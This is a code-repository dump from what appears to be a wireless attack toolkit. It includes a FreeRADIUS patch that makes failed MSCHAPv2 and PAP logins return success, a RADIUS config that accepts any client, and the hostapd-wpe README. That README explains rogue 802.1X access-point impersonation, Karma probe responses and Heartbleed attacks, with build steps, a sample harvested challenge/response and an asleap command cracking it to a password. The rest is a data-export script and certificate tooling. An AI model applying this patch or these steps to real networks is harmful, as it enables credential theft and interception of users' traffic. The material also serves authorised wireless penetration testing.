| table_name = ['accessPoints', 'ProbeRequests', 'ProbeRequests', 'EAP', 'Hidden_SSID', 'inscope_accessPoints', 'inscope_ProbeRequests', 'inscope_ProbeResponses'] 17 | sheet_name = ['AccessPoints', 'ProbeRequests', 'ProbeRequests', 'EAP', 'Hidden_SSID', 'Inscope_AccessPoints', 'Inscope_ProbeRequests', 'Inscope_ProbeResponses'] 18 | ws = workspace 19 | q = queries() 20 | ws1 = q.db_connect(ws) 21 | writer = dp.ExcelWriter(path+name+'.xlsx', engine='xlsxwriter') 22 | j = 0 23 | print "Exporting: "+path+name+'.xlsx' 24 | for tbn in table_name: 25 | try: 26 | td = dp.read_sql('select * from '+tbn+'', ws1) 27 | if td.empty: 28 | pass 29 | j +=1 30 | print colors.RD + "[-]" + colors.NRM + " Skipping: " + sheet_name[j] + ". No Data in table." 31 | else: 32 | td.to_excel(writer, sheet_name=''+sheet_name[j]+'', index=False) 33 | j +=1 34 | print colors.GRN + "[+]" + colors.NRM + " Exporting: " + sheet_name[j] + "." 35 | except ValueError: 36 | continue 37 | except pandas.io.sql.DatabaseError: 38 | continue 39 | writer.save() 40 | print "Export Completed" 41 | -------------------------------------------------------------------------------- /module/gtc/PuNk1n.patch: -------------------------------------------------------------------------------- 1 | diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_mschapv2/rlm_eap_mschapv2.c free-booty/src/modules/rlm_eap/types/rlm_eap_mschapv2/rlm_eap_mschapv2.c 2 | --- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_mschapv2/rlm_eap_mschapv2.c 2011-09-30 07:12:07.000000000 -0700 3 | +++ free-booty/src/modules/rlm_eap/types/rlm_eap_mschapv2/rlm_eap_mschapv2.c 2013-03-06 14:52:58.654060839 -0700 4 | @@ -685,12 +685,12 @@ 5 | PW_MSCHAP2_SUCCESS); 6 | data->code = PW_EAP_MSCHAPV2_SUCCESS; 7 | 8 | - } else if (inst->send_error) { 9 | - pairmove2(&response, &handler->request->reply->vps, 10 | - PW_MSCHAP_ERROR); 11 | - data->code = PW_EAP_MSCHAPV2_FAILURE; 12 | + } else if (rcode == RLM_MODULE_FAIL) { 13 | + pairmove2(&response, &handler->request->reply->vps, 14 | + PW_MSCHAP2_SUCCESS); 15 | + data->code = PW_EAP_MSCHAPV2_SUCCESS; 16 | } else { 17 | - eap_ds->request->code = PW_EAP_FAILURE; 18 | + eap_ds->request->code = PW_EAP_MSCHAPV2_SUCCESS; 19 | return 1; 20 | } 21 | 22 | diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c free-booty/src/modules/rlm_pap/rlm_pap.c 23 | --- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c 2011-09-30 07:12:07.000000000 -0700 24 | +++ free-booty/src/modules/rlm_pap/rlm_pap.c 2013-03-06 14:50:57.750056029 -0700 25 | @@ -578,7 +578,7 @@ 26 | 27 | fail: 28 | RDEBUG("No password configured for the user. Cannot do authentication"); 29 | - return RLM_MODULE_FAIL; 30 | + return RLM_MODULE_OK; 31 | 32 | } else { 33 | vp = NULL; -------------------------------------------------------------------------------- /module/gtc/clients.conf: -------------------------------------------------------------------------------- 1 | # -*- text -*- 2 | ## 3 | ## clients.conf -- client configuration directives 4 | ## 5 | ## $Id$ 6 | 7 | ####################################################################### 8 | # 9 | # Define RADIUS clients (usually a NAS, Access Point, etc.). 10 | 11 | # 12 | # Defines a RADIUS client. 13 | # 14 | # '127.0.0.1' is another name for 'localhost'. It is enabled by default, 15 | # to allow testing of the server after an initial installation. If you 16 | # are not going to be permitting RADIUS queries from localhost, we suggest 17 | # that you delete, or comment out, this entry. 18 | # 19 | # 20 | 21 | # 22 | # Each client has a "short name" that is used to distinguish it from 23 | # other clients. 24 | # 25 | # In version 1.x, the string after the word "client" was the IP 26 | # address of the client. In 2.0, the IP address is configured via 27 | # the "ipaddr" or "ipv6addr" fields. For compatibility, the 1.x 28 | # format is still accepted. 29 | # 30 | 31 | client 0.0.0.0/0 { 32 | secret = testing123 33 | } 34 | client localhost { 35 | # Allowed values are: 36 | # dotted quad (1.2.3.4) 37 | # hostname (radius.example.com) 38 | ipaddr = 127.0.0.1 39 | 40 | # OR, you can use an IPv6 address, but not both 41 | # at the same time. 42 | # ipv6addr = :: # any. ::1 == localhost 43 | 44 | # 45 | # A note on DNS: We STRONGLY recommend using IP addresses 46 | # rather than host names. Using host names means that the 47 | # server will do DNS lookups when it starts, making it 48 | # dependent on DNS. i.e. If anything goes wrong with DNS, 49 | # the server won't start! 50 | # 51 | # The server also looks up the IP address from DNS once, and 52 | # only once, when it starts. If the DNS record is later 53 | # updated, the server WILL NOT see that update. 54 | # 55 | 56 | # One client definition can be applied to an entire network. 57 | # e.g. 127/8 should be defined with "ipaddr = 127.0.0.0" and 58 | # "netmask = 8" 59 | # 60 | # If not specified, the default netmask is 32 (i.e. /32) 61 | # 62 | # We do NOT recommend using anything other than 32. There 63 | # are usually other, better ways to achieve the same goal. 64 | # Using netmasks of other than 32 can cause security issues. 65 | # 66 | # You can specify overlapping networks (127/8 and 127.0/16) 67 | # In that case, the smallest possible network will be used 68 | # as the "best match" for the client. 69 | # 70 | # Clients can also be defined dynamically at run time, based 71 | # on any criteria. e.g. SQL lookups, keying off of NAS-Identifier, 72 | # etc. 73 | # See raddb/sites-available/dynamic-clients for details. 74 | # 75 | 76 | # netmask = 32 77 | 78 | # 79 | # The shared secret use to "encrypt" and "sign" packets between 80 | # the NAS and FreeRADIUS. You MUST change this secret from the 81 | # default, otherwise it's not a secret any more! 82 | # 83 | # The secret can be any string, up to 8k characters in length. 84 | # 85 | # Control codes can be entered vi octal encoding, 86 | # e.g. "\101\102" == "AB" 87 | # Quotation marks can be entered by escaping them, 88 | # e.g. "foo\"bar" 89 | # 90 | # A note on security: The security of the RADIUS protocol 91 | # depends COMPLETELY on this secret! We recommend using a 92 | # shared secret that is composed of: 93 | # 94 | # upper case letters 95 | # lower case letters 96 | # numbers 97 | # 98 | # And is at LEAST 8 characters long, preferably 16 characters in 99 | # length. The secret MUST be random, and should not be words, 100 | # phrase, or anything else that is recognizable. 101 | # 102 | # The default secret below is only for testing, and should 103 | # not be used in any real environment. 104 | # 105 | secret = testing123 106 | 107 | # 108 | # Old-style clients do not send a Message-Authenticator 109 | # in an Access-Request. RFC 5080 suggests that all clients 110 | # SHOULD include it in an Access-Request. The configuration 111 | # item below allows the server to require it. If a client 112 | # is required to include a Message-Authenticator and it does 113 | # not, then the packet will be silently discarded. 114 | # 115 | # allowed values: yes, no 116 | require_message_authenticator = no 117 | 118 | # 119 | # The short name is used as an alias for the fully qualified 120 | # domain name, or the IP address. 121 | # 122 | # It is accepted for compatibility with 1.x, but it is no 123 | # longer necessary in 2.0 124 | # 125 | # shortname = localhost 126 | 127 | # 128 | # the following three fields are optional, but may be used by 129 | # checkrad.pl for simultaneous use checks 130 | # 131 | 132 | # 133 | # The nastype tells 'checkrad.pl' which NAS-specific method to 134 | # use to query the NAS for simultaneous use. 135 | # 136 | # Permitted NAS types are: 137 | # 138 | # cisco 139 | # computone 140 | # livingston 141 | # max40xx 142 | # multitech 143 | # netserver 144 | # pathras 145 | # patton 146 | # portslave 147 | # tc 148 | # usrhiper 149 | # other # for all other types 150 | 151 | # 152 | nastype = other # localhost isn't usually a NAS... 153 | 154 | # 155 | # The following two configurations are for future use. 156 | # The 'naspasswd' file is currently used to store the NAS 157 | # login name and password, which is used by checkrad.pl 158 | # when querying the NAS for simultaneous use. 159 | # 160 | # login = !root 161 | # password = someadminpas 162 | 163 | # 164 | # As of 2.0, clients can also be tied to a virtual server. 165 | # This is done by setting the "virtual_server" configuration 166 | # item, as in the example below. 167 | # 168 | # virtual_server = home1 169 | 170 | # 171 | # A pointer to the "home_server_pool" OR a "home_server" 172 | # section that contains the CoA configuration for this 173 | # client. For an example of a coa home server or pool, 174 | # see raddb/sites-available/originate-coa 175 | # coa_server = coa 176 | } 177 | 178 | # IPv6 Client 179 | #client ::1 { 180 | # secret = testing123 181 | # shortname = localhost 182 | #} 183 | # 184 | # All IPv6 Site-local clients 185 | #client fe80::/16 { 186 | # secret = testing123 187 | # shortname = localhost 188 | #} 189 | 190 | #client some.host.org { 191 | # secret = testing123 192 | # shortname = localhost 193 | #} 194 | 195 | # 196 | # You can now specify one secret for a network of clients. 197 | # When a client request comes in, the BEST match is chosen. 198 | # i.e. The entry from the smallest possible network. 199 | # 200 | #client 192.168.0.0/24 { 201 | # secret = testing123-1 202 | # shortname = private-network-1 203 | #} 204 | # 205 | #client 192.168.0.0/16 { 206 | # secret = testing123-2 207 | # shortname = private-network-2 208 | #} 209 | 210 | 211 | #client 10.10.10.10 { 212 | # # secret and password are mapped through the "secrets" file. 213 | # secret = testing123 214 | # shortname = liv1 215 | # # the following three fields are optional, but may be used by 216 | # # checkrad.pl for simultaneous usage checks 217 | # nastype = livingston 218 | # login = !root 219 | # password = someadminpas 220 | #} 221 | 222 | ####################################################################### 223 | # 224 | # Per-socket client lists. The configuration entries are exactly 225 | # the same as above, but they are nested inside of a section. 226 | # 227 | # You can have as many per-socket client lists as you have "listen" 228 | # sections, or you can re-use a list among multiple "listen" sections. 229 | # 230 | # Un-comment this section, and edit a "listen" section to add: 231 | # "clients = per_socket_clients". That IP address/port combination 232 | # will then accept ONLY the clients listed in this section. 233 | # 234 | #clients per_socket_clients { 235 | # client 192.168.3.4 { 236 | # secret = testing123 237 | # } 238 | #} 239 | -------------------------------------------------------------------------------- /module/hostapd-wpe/README: -------------------------------------------------------------------------------- 1 | hostapd-wpe (Wireless Pwnage Edition) 2 | brad.antoniewicz@foundstone.com 3 | twitter: @brad_anton 4 | ------------------------------------------ 5 | 6 | The current hostapd-wpe.patch is for: hostapd-2.6.tar.gz 7 | 8 | About 9 | ---------- 10 | 11 | hostapd-wpe is the replacement for FreeRADIUS-WPE 12 | (http://www.willhackforsushi.com/?page_id=37). 13 | 14 | It implements IEEE 802.1x Authenticator and Authentication 15 | Server impersonation attacks to obtain client credentials, 16 | establish connectivity to the client, and launch other attacks 17 | where applicable. 18 | 19 | hostapd-wpe supports the following EAP types for impersonation: 20 | 1. EAP-FAST/MSCHAPv2 (Phase 0) 21 | 2. PEAP/MSCHAPv2 22 | 3. EAP-TTLS/MSCHAPv2 23 | 4. EAP-TTLS/MSCHAP 24 | 5. EAP-TTLS/CHAP 25 | 6. EAP-TTLS/PAP 26 | 27 | Once impersonation is underway, hostapd-wpe will return an 28 | EAP-Success message so that the client believes they are connected 29 | to their legitimate authenticator. 30 | 31 | For 802.11 clients, hostapd-wpe also implements Karma-style gratuitous 32 | probe responses. Inspiration for this was provided by JoMo-Kun's 33 | patch for older versions of hostapd. 34 | 35 | http://www.foofus.net/?page_id=115 36 | 37 | hostapd-wpe also implements CVE-2014-0160 (Heartbleed) attacks against 38 | vulnerable clients. Inspiration for this was provided by the Cupid PoC: 39 | 40 | https://github.com/lgrangeia/cupid 41 | 42 | hostapd-wpe logs all data to stdout and hostapd-wpe.log 43 | 44 | Quick Usage 45 | -------- 46 | Once hostapd-wpe.patch is applied, hostapd-wpe.conf will be created 47 | at /path/to/build/hostapd/hostapd-wpe.conf. See that file for more 48 | information. Note that /path/to/build/hostapd/hostapd-wpe.eap_users 49 | will also be created, and hostapd-wpe is dependent on it. 50 | 51 | Basic usage is: 52 | 53 | hostapd-wpe hostapd-wpe.conf 54 | 55 | Credentials will be displayed on the screen and stored in hostapd-wpe.log 56 | 57 | Additional WPE command line options are: 58 | 59 | -s Return EAP-Success messages after credentials are harvested 60 | -k Gratuitous probe responses (Karma mode) 61 | -c Attempt to exploit CVE-2014-0160 (Cupid mode) 62 | 63 | Building 64 | --------- 65 | 66 | $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe 67 | 68 | Ubuntu/Debian/Kali Building - 69 | ----------------------------------------------------------------------- 70 | $ apt-get update 71 | $ apt-get install libssl-dev libnl-dev 72 | 73 | if you're using Kali 2.0 install: 74 | $ apt-get install libssl-dev libnl-genl-3-dev 75 | 76 | 77 | General - 78 | ------------------------------------------------------------------------ 79 | Now apply the hostapd-wpe.patch: 80 | 81 | $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe 82 | 83 | $ wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz 84 | $ tar -zxf hostapd-2.6.tar.gz 85 | $ cd hostapd-2.6 86 | $ patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 87 | $ cd hostapd 88 | 89 | If you're using Kali 2.0 edit .config file and uncomment: 90 | CONFIG_LIBNL32=y 91 | 92 | $ make 93 | 94 | I copied the certs directory and scripts from FreeRADIUS to ease that 95 | portion of things. You should just be able to: 96 | 97 | $ cd ../../hostapd-wpe/certs 98 | $ ./bootstrap 99 | 100 | then finally just: 101 | 102 | $ cd ../../hostapd-2.6/hostapd 103 | $ sudo ./hostapd-wpe hostapd-wpe.conf 104 | 105 | 106 | Running: 107 | ---------------- 108 | 109 | With all of that complete, you can run hostapd. The patch will 110 | create a new hostapd-wpe.conf, which you'll likely need to modify 111 | in order to make it work for your attack. Once ready just run 112 | 113 | hostapd hostapd-wpe.conf 114 | 115 | Look in the output for the username/challenge/response. It'll be there 116 | and in a hostapd-wpe.log file in the directory you ran hostapd from 117 | 118 | for instance here are the EAP-FAST Phase 0 creds from stdout: 119 | 120 | username: jdslfkjs 121 | challenge: bc:87:6c:48:37:d3:92:6e 122 | response: 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 123 | 124 | and as always, we feed them into asleap to crack: 125 | 126 | # asleap -C bc:87:6c:48:37:d3:92:6e -R 2d:00:61:59:56:06:02:dd:35:4a:0f:99:c8:6b:e1:fb:a3:04:ca:82:40:92:7c:f0 -W wordlist 127 | asleap 2.2 - actively recover LEAP/PPTP passwords. 128 | hash bytes: b1ca 129 | NT hash: e614b958df9df49ec094b8730f0bb1ca 130 | password: bradtest 131 | 132 | Alternatively MSCHAPv2 credentials are outputted in john the rippers NETNTLM format. 133 | 134 | 135 | EAP-Success 136 | -------------- 137 | Certain EAP types do not require the server to authenticate itself, just to validate 138 | the client's submitted credentials. Since we're playing the authentication server, 139 | that means we can easily just return an EAP-Success message to the client regardless 140 | of what they send us. The client is happy because they've connected, but unfortunately 141 | are unaware that they are connected to an unapproved authenticator. 142 | 143 | At this point, the attacker can set up a dhcp server and give the client an IP and 144 | then do whatever they'd like (e.g. redirect dns, launch attacks, MiTM, etc..) 145 | 146 | MSCHAPv2 protects against this by having the server prove knowledge of the password 147 | most supplicants adhere to this policy, but we return EAP-Success just in case. 148 | 149 | Karma-Style Probes 150 | ------------------ 151 | This functionality simply waits for an client to send a directed probe, when it does, it 152 | assumes that SSID and responds to the client. Only applicable to 802.11 clients. 153 | 154 | A note on MSCHAPv2 155 | ------------------- 156 | Microsoft offers something called "Computer Based Authentication". When a computer 157 | joins a domain it is assigned a password. This password is stored on the system 158 | and in active directory. We can harvest the MSCHAPv2 response from these systems but 159 | its going to take a lifetime to crack. Unless you're just trying to solve for the 160 | hash, and not the actual password :) 161 | 162 | One other thing to note, if the client returns all zeros, it isnt joined to a domain. 163 | 164 | Testing Heartbleed 165 | --------------- 166 | If you're running Ubuntu and want to test Heartbleed you'll need to downgrade to a vulnerable 167 | version of OpenSSL. That can be done by: 168 | 169 | wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/openssl_1.0.1-4ubuntu5.11_i386.deb 170 | wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl-dev_1.0.1-4ubuntu5.11_i386.deb 171 | wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl-doc_1.0.1-4ubuntu5.11_all.deb 172 | wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb 173 | sudo dpkg -i libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb 174 | sudo dpkg --install libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb \ 175 | libssl-dev_1.0.1-4ubuntu5.11_i386.deb \ 176 | libssl-doc_1.0.1-4ubuntu5.11_all.deb \ 177 | openssl_1.0.1-4ubuntu5.11_i386.deb 178 | 179 | 180 | The use wpa_supplicant to connect to hostapd-wpe -c 181 | 182 | 183 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/01.pem: -------------------------------------------------------------------------------- 1 | Certificate: 2 | Data: 3 | Version: 3 (0x2) 4 | Serial Number: 1 (0x1) 5 | Signature Algorithm: md5WithRSAEncryption 6 | Issuer: C=FR, ST=Radius, L=Somewhere, O=Example Inc./emailAddress=admin@example.com, CN=Example Certificate Authority 7 | Validity 8 | Not Before: Sep 15 02:44:46 2017 GMT 9 | Not After : Sep 15 02:44:46 2018 GMT 10 | Subject: C=FR, ST=Radius, O=Example Inc., CN=Example Server Certificate/emailAddress=admin@example.com 11 | Subject Public Key Info: 12 | Public Key Algorithm: rsaEncryption 13 | Public-Key: (2048 bit) 14 | Modulus: 15 | 00:aa:ed:54:dc:3f:6d:44:40:26:36:a0:36:a8:77: 16 | 1c:02:a5:4c:b8:69:79:95:42:53:a9:38:a2:bc:51: 17 | 9f:6e:47:ab:55:f8:94:28:4c:17:81:17:2f:02:3a: 18 | 7d:94:fb:4e:b9:c8:87:23:f8:68:85:a1:52:03:75: 19 | fb:cb:76:1a:04:64:62:c9:88:a0:19:df:46:4c:07: 20 | 5b:9d:e3:6b:88:ff:7b:e6:99:67:d3:b7:ff:f7:9d: 21 | 62:34:dc:fe:b8:29:45:ea:c2:d5:b7:62:13:90:81: 22 | 13:0e:9e:30:6e:e5:4d:22:a5:1a:a5:9d:c2:b7:91: 23 | 33:80:eb:9b:2e:6d:d8:77:75:f6:51:bb:a6:6d:ba: 24 | 61:72:e7:f3:46:f3:5f:a2:29:da:a1:e8:e6:ae:21: 25 | 09:28:ec:f3:62:70:42:80:d4:3d:f7:63:f4:1f:84: 26 | 60:cb:ca:b5:01:32:ea:1d:8b:bb:e5:58:9e:69:84: 27 | 0a:1a:75:89:26:9c:a5:71:db:a8:77:00:79:5d:d4: 28 | 7d:1c:a6:dd:7e:06:36:6b:7f:a9:5a:7c:e9:6b:bc: 29 | fc:cd:58:03:54:ca:30:23:66:b4:c1:2b:39:d6:c7: 30 | 68:43:12:04:79:59:ad:16:48:c2:c3:94:67:56:44: 31 | 0e:b4:c6:29:05:6a:3f:7a:3d:81:98:86:45:5c:53: 32 | 90:23 33 | Exponent: 65537 (0x10001) 34 | X509v3 extensions: 35 | X509v3 Extended Key Usage: 36 | TLS Web Server Authentication 37 | Signature Algorithm: md5WithRSAEncryption 38 | 93:c3:3b:04:3f:2f:a4:d0:3e:05:4d:8b:2a:3b:75:97:7c:49: 39 | e0:69:e2:2b:4b:a0:ad:c7:b4:67:1b:47:c3:d7:d4:13:60:e3: 40 | 02:0a:cf:c8:27:a5:a2:96:8f:18:43:16:f5:02:ed:af:ed:b7: 41 | e6:67:30:dd:28:08:09:3b:90:18:a6:34:16:3a:5a:10:76:5d: 42 | a1:b8:52:84:69:39:cc:76:f2:72:90:8c:57:2f:36:5b:99:55: 43 | 01:83:16:20:63:67:12:87:a0:78:3e:1e:4a:e7:bf:5a:01:de: 44 | ad:ae:51:55:cc:6b:2e:e4:32:ea:ae:a1:71:33:f5:ea:58:c3: 45 | 89:b6:84:a9:9d:ae:ce:f4:42:6a:c5:f6:a8:2f:7d:8c:3d:e9: 46 | 99:f7:0a:fc:c4:c4:c3:3b:b9:ad:cb:0d:30:87:05:96:c7:e7: 47 | bb:78:fd:43:11:a1:fe:8e:87:4b:1a:f1:38:bc:1b:28:0f:82: 48 | e7:63:5c:c8:0d:52:b6:dd:da:32:b1:b4:f8:5d:95:b2:cf:37: 49 | 1c:2a:2c:43:c5:52:9a:5d:74:25:76:a0:55:e0:be:81:5d:31: 50 | 57:8e:e5:6e:05:19:5b:a7:db:d1:ee:66:39:e4:da:42:e4:08: 51 | a5:22:70:97:1c:68:21:2d:d7:7e:10:a4:76:08:99:57:c2:0d: 52 | fc:94:1e:17 53 | -----BEGIN CERTIFICATE----- 54 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx 55 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF 56 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw 57 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xNzA5MTUw 58 | MjQ0NDZaFw0xODA5MTUwMjQ0NDZaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS 59 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT 60 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu 61 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqu1U3D9tREAmNqA2 62 | qHccAqVMuGl5lUJTqTiivFGfbkerVfiUKEwXgRcvAjp9lPtOuciHI/hohaFSA3X7 63 | y3YaBGRiyYigGd9GTAdbneNriP975pln07f/951iNNz+uClF6sLVt2ITkIETDp4w 64 | buVNIqUapZ3Ct5EzgOubLm3Yd3X2UbumbbphcufzRvNfoinaoejmriEJKOzzYnBC 65 | gNQ992P0H4Rgy8q1ATLqHYu75VieaYQKGnWJJpylcduodwB5XdR9HKbdfgY2a3+p 66 | Wnzpa7z8zVgDVMowI2a0wSs51sdoQxIEeVmtFkjCw5RnVkQOtMYpBWo/ej2BmIZF 67 | XFOQIwIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF 68 | AAOCAQEAk8M7BD8vpNA+BU2LKjt1l3xJ4GniK0ugrce0ZxtHw9fUE2DjAgrPyCel 69 | opaPGEMW9QLtr+235mcw3SgICTuQGKY0FjpaEHZdobhShGk5zHbycpCMVy82W5lV 70 | AYMWIGNnEoegeD4eSue/WgHera5RVcxrLuQy6q6hcTP16ljDibaEqZ2uzvRCasX2 71 | qC99jD3pmfcK/MTEwzu5rcsNMIcFlsfnu3j9QxGh/o6HSxrxOLwbKA+C52NcyA1S 72 | tt3aMrG0+F2Vss83HCosQ8VSml10JXagVeC+gV0xV47lbgUZW6fb0e5mOeTaQuQI 73 | pSJwlxxoIS3XfhCkdgiZV8IN/JQeFw== 74 | -----END CERTIFICATE----- 75 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/Makefile: -------------------------------------------------------------------------------- 1 | ###################################################################### 2 | # 3 | # Make file to be installed in /etc/raddb/certs to enable 4 | # the easy creation of certificates. 5 | # 6 | # See the README file in this directory for more information. 7 | # 8 | # $Id$ 9 | # 10 | ###################################################################### 11 | 12 | DH_KEY_SIZE = 1024 13 | 14 | # 15 | # Set the passwords 16 | # 17 | PASSWORD_SERVER = `grep output_password server.cnf | sed 's/.*=//;s/^ *//'` 18 | PASSWORD_CA = `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` 19 | PASSWORD_CLIENT = `grep output_password client.cnf | sed 's/.*=//;s/^ *//'` 20 | 21 | USER_NAME = `grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//'` 22 | CA_DEFAULT_DAYS = `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` 23 | 24 | ###################################################################### 25 | # 26 | # Make the necessary files, but not client certificates. 27 | # 28 | ###################################################################### 29 | .PHONY: all 30 | all: index.txt serial dh random server ca 31 | 32 | .PHONY: client 33 | client: client.pem 34 | 35 | .PHONY: ca 36 | ca: ca.der 37 | 38 | .PHONY: server 39 | server: server.pem server.vrfy 40 | 41 | ###################################################################### 42 | # 43 | # Diffie-Hellman parameters 44 | # 45 | ###################################################################### 46 | dh: 47 | openssl dhparam -out dh $(DH_KEY_SIZE) 48 | 49 | ###################################################################### 50 | # 51 | # Create a new self-signed CA certificate 52 | # 53 | ###################################################################### 54 | ca.key ca.pem: ca.cnf 55 | openssl req -new -x509 -keyout ca.key -out ca.pem \ 56 | -days $(CA_DEFAULT_DAYS) -config ./ca.cnf 57 | 58 | ca.der: ca.pem 59 | openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der 60 | 61 | ###################################################################### 62 | # 63 | # Create a new server certificate, signed by the above CA. 64 | # 65 | ###################################################################### 66 | server.csr server.key: server.cnf 67 | openssl req -new -out server.csr -keyout server.key -config ./server.cnf 68 | 69 | server.crt: server.csr ca.key ca.pem 70 | openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf 71 | 72 | server.p12: server.crt 73 | openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 74 | 75 | server.pem: server.p12 76 | openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 77 | 78 | .PHONY: server.vrfy 79 | server.vrfy: ca.pem 80 | openssl verify -CAfile ca.pem server.pem 81 | 82 | ###################################################################### 83 | # 84 | # Create a new client certificate, signed by the the above server 85 | # certificate. 86 | # 87 | ###################################################################### 88 | client.csr client.key: client.cnf 89 | openssl req -new -out client.csr -keyout client.key -config ./client.cnf 90 | 91 | client.crt: client.csr ca.pem ca.key 92 | openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 93 | 94 | client.p12: client.crt 95 | openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 96 | 97 | client.pem: client.p12 98 | openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 99 | cp client.pem $(USER_NAME).pem 100 | 101 | .PHONY: client.vrfy 102 | client.vrfy: server.pem client.pem 103 | c_rehash . 104 | openssl verify -CApath . client.pem 105 | 106 | ###################################################################### 107 | # 108 | # Miscellaneous rules. 109 | # 110 | ###################################################################### 111 | index.txt: 112 | @touch index.txt 113 | 114 | serial: 115 | @echo '01' > serial 116 | 117 | random: 118 | @if [ -c /dev/urandom ] ; then \ 119 | dd if=/dev/urandom of=./random count=10 >/dev/null 2>&1; \ 120 | else \ 121 | date > ./random; \ 122 | fi 123 | 124 | print: 125 | openssl x509 -text -in server.crt 126 | 127 | printca: 128 | openssl x509 -text -in ca.pem 129 | 130 | clean: 131 | @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem 132 | 133 | # 134 | # Make a target that people won't run too often. 135 | # 136 | destroycerts: 137 | rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \ 138 | serial* random *\.0 *\.1 139 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/bootstrap: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # This is a wrapper script to create default certificates when the 4 | # server first starts in debugging mode. Once the certificates have been 5 | # created, this file should be deleted. 6 | # 7 | # Ideally, this program should be run as part of the installation of any 8 | # binary package. The installation should also ensure that the permissions 9 | # and owners are correct for the files generated by this script. 10 | # 11 | # $Id$ 12 | # 13 | umask 027 14 | cd `dirname $0` 15 | 16 | make -h > /dev/null 2>&1 17 | 18 | # 19 | # If we have a working "make", then use it. Otherwise, run the commands 20 | # manually. 21 | # 22 | if [ "$?" = "0" ]; then 23 | make all 24 | exit $? 25 | fi 26 | 27 | # 28 | # The following commands were created by running "make -n", and edited 29 | # to remove the trailing backslash, and to add "exit 1" after the commands. 30 | # 31 | # Don't edit the following text. Instead, edit the Makefile, and 32 | # re-generate these commands. 33 | # 34 | if [ ! -f dh ]; then 35 | openssl dhparam -out dh 1024 || exit 1 36 | if [ -e /dev/urandom ] ; then 37 | dd if=/dev/urandom of=./random count=10 >/dev/null 2>&1; 38 | else 39 | date > ./random; 40 | fi 41 | fi 42 | 43 | if [ ! -f server.key ]; then 44 | openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1 45 | fi 46 | 47 | if [ ! -f ca.key ]; then 48 | openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1 49 | fi 50 | 51 | if [ ! -f index.txt ]; then 52 | touch index.txt 53 | fi 54 | 55 | if [ ! -f serial ]; then 56 | echo '01' > serial 57 | fi 58 | 59 | if [ ! -f server.crt ]; then 60 | openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1 61 | fi 62 | 63 | if [ ! -f server.p12 ]; then 64 | openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 65 | fi 66 | 67 | if [ ! -f server.pem ]; then 68 | openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 69 | openssl verify -CAfile ca.pem server.pem 